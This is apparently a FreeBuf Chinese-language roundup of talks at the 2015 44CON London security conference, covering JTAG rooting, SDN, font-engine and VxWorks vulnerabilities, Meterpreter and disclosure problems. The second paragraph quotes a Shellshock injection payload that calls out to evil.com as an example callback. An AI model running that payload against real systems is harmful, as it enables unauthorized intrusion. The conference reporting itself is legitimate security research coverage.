在2015年9月9日-11日举办的“44 CON 伦敦”峰会中,共有两轮议题,这里挑选了一些议题进行了简单介绍。FreeBuf后续还会有深入报道。
议题中,演讲者展示漏洞利用诱导回调会远远不止() { :;}; echo 1 > /dev/udp/evil.com/53来找盲注和异步XXE、(DOM)XSS、SQLi、SMTP以及单纯XML注入攻击。像是二阶SQL盲注以及通过cronijobs或者异步登录功能进行的shell命令注入,能够轻松进行渗透测试并获得成效。
JTAG几乎与每个硬件相关的攻击都有关系。这个议题枚举了将jtag访问“check”(检测)变为根shell访问“checkmate”的不同方式。每个例子都将展示一个通过JTAG获取root权限的特殊方式。而每种方式又能不同程度地广泛应用于不同硬件体系结构并实现。演说中具体的代码和脚本将被公布。
SDN由研发到生产部署的快速发展,总是伴随着一些令人担忧的安全问题。此议题中概括了SDN技术的出现,它们暴露出的受攻击面以及一些在SDN控制器中被发现漏洞。最后我们将会着眼于目前提升SDN控制器安全性的努力。
虚拟专用网络(VPN)十分受欢迎,大部分公司都有VPN,让员工能够远程办公。而在一些特殊情况下,VPN也被用于犯罪,因为它可以掩盖真实地址。FirstWatch公开了一家为与中国相关的多个VPN品牌有合作的服务商,最后统计发现兵马俑VPN节点生态系统包括了世界各地的1500多个节点。这些节点大多是由被攻击者入侵的Windows服务器搭建而成。
演讲者Richo将带领与会者一起回顾一个传统AOT编译器以及运行时加载器的基本体系结构,并介绍了这些与现代字节代码VM(python、ruby等)操作之间的相似之处。有了这些新的发现,我们便可以编写一个工具去逆向分析一个被混淆的ruby脚本示例文件。然而,我们没有直接对字节代码进行分析,而是使用了全功能性的VM,来挖掘各种反分析技术的部署。
在15分钟内,研究者应该对于发生了的事情有个粗略的了解,即便出现“阵亡”,也要处于一个更利于分析的位置。Shell脚本展示了对系统的最小化干扰,并通过网络将所有信息发送给取证工作站。
与会人员并不需要具备超越基础Linux的知识,而演讲者将分享一些用于实时分析的工具,并为首次接触到shell脚本编程的人们进行一些清晰介绍。
议题向我们展示了硬件开发之旅:USB兵工厂、开源硬件设计,以及在安全应用程序中添加一个闪存驱动器大小的电脑。
演讲者总结了从开源工具中汲取的的经验,制作外形小、规格高的嵌入式设备,以及如安全启动和ARM TrustZone执行的结构与安全性能。
议题概述了当前字体安全的前沿研究,回顾了80年代、90年代至今经历的排版与各种字体引擎之间关系的变迁,后面列举了潜在的攻击面,演讲者将讨论广泛专有OpenType/CFF实现的逆向工程过程,例如Windows kernel ATMFD.DLL模块(Adobe Type Manager Font Driver),并提供了对根本原因的深入分析和开发过程中发现的产品漏洞利用,其中包括微软、Adobe Reader、DirectWrite(Internet Explorer)、FreeType等安全漏洞。
Windows 10为了成为最安全的操作系统加入了很多新功能,如控制流保护(CFG, Control Flow Guard)、凭证隔离(Credentials Isolation)。但是与此同时,很多新功能中存在的漏洞却又将系统的安全性降低了。这个议题介绍的就是这些新的安全功能中的漏洞,这些漏洞证明,要想在实践中真正做到安全还是很难的。
你是否已经厌倦了管理无数的脚本执行中间人攻击?
你是否厌倦了以不撞南墙不回头地决心去寻找Ettercap筛选器不工作的原因?
然而,中间人攻击测试框架集合了新旧中间人攻击技术于一个框架中。Python语言编写,有极强的可拓展性和可靠性,将带领中间人攻击迈入现在的21世纪。
VxWorks是世界上使用最广泛的实时操作系统,部署在嵌入式系统中。VxWorks的市场遍布各种关键的领域,包括好奇号火星探测器、波音787梦幻客机等。在这些项目中的应用使得VxWorks的安全性成为了一个重要的问题。我们团队对VxWorks进行了充分的安全分析,包括它支持的网络协议和操作系统安全机制。我们会展示我们开发的,对VxWorks进行评估的工具,我们工具的目标就是通过在python中实现WdbRPC协议对VxWorks进行高效的渗透测试。届时我们还会展示几个漏洞。最后我们还会展示一个远程代码执行的漏洞,在互联网进行的快速扫描结果显示,至少10万台运行VxWorks的设备接入了互联网,因此这个漏洞的影响广泛。
这个议题会针对FireEye的恶意软件保护系统(MPS)最近爆出的大量漏洞进行回顾,其中还包括了一些正在修复的漏洞。这些漏洞包括对管理web界面的命令行注入漏洞、本地权限提升漏洞等。
演讲者将对这些问题的解决方案进行讨论。
这个议题讨论的是恶意软件作者使用的不同恶意软件取证或者逆向工程的方式。演讲者针对反取证的历史以及现在那些方式正在被采用进行深入探讨。
Meterpreter在过去几年中发展迅猛,不断地迎接新的功能和更加稳定的特性。
这个议题将加深人们对于Materpreter的变化与成就的了解。不仅过去的特性在此所有提及,新的性能也得到了充分的讨论,而议题重点将放在如何利用这些新特点帮助建立“队伍”以及巩固他们的立足点。
Oj和Dan均从事安全评估工作很多年了。他们讲设备中发现的重大漏洞报道给供应商后,有时供应商会表示关注并在随后采取行动,然而更多的情况是,供应商假装努力解决问题,实则完全忽略了研究员,有的甚至公开说“走开”。演讲者将“负责任地披露漏洞”所面临的挑战一一指出,而这些公司也陷入了是否应该帮自己的解决问题困境。
*参考来源: 44con.com ,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)